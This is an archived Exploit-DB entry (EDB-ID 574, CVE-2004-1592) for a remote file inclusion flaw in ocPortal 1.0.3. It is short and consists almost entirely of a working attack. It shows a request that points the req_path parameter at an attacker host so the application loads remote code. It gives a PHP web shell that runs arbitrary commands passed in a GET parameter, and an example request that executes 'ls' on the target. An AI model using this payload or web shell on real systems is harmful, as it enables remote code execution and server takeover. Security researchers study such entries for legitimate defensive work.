ocPortal 1.0.3 - Remote File Inclusion

2004-10-13T00:00:00
ID EDB-ID:574
Type exploitdb
Reporter Exoduks
Modified 2004-10-13T00:00:00

Description

ocPortal 1.0.3 Remote File Inclusion. CVE-2004-1592. Webapps exploit for php platform

                                        
                                            http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# milw0rm.com [2004-10-13]